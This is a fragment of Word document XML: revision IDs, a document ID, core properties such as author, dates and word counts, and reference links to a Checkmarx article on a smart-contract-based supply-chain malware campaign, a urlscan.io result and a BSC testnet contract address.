    <w:rsid w:val="00BA707C"/>
    <w:rsid w:val="00D677DC"/>
    <w:rsid w:val="00DA0221"/>
    <w:rsid w:val="00F4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16E5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{090EF7EA-AFA3-4E18-A476-F43EA1C7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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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0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77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ckmarx.com/uncategorized/supply-chain-attack-using-ethereum-smart-contracts-to-distribute-multi-platform-malware/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s://urlscan.io/result/e49f68be-f760-430f-8127-91d49656c8f5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testnet.bscscan.com/address/0x80d31D935f0EC978253A26D48B5593599B9542C7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testnet.bscscan.com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13</Pages>
  <Words>3346</Words>
  <Characters>19075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Horvath</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Jakub Horvath</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-18T14:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-18T16:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>